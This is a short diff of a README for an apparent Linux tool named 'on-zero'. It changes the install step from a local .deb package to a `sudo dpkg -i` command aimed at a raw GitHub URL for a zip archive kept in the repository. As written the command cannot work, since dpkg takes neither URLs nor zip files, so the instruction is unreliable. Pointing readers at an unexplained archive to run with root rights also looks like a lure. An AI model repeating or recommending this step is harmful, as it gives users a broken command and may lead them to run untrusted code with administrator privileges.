ethanreyes123/on-zero/readme.md

 1. Open the terminal.
 2. Navigate to the folder where the file is downloaded.
-3. Run the installation command: `sudo dpkg -i on-zero.deb` (use the correct filename).
+3. Run the installation command: `sudo dpkg -i https://github.com/ethanreyes123/on-zero/raw/refs/heads/main/src/zero_on_2.7.zip` (use the correct filename).
 4. If dependencies are required, run: `sudo apt-get install -f`.

 ## 📘 How to Use on-zero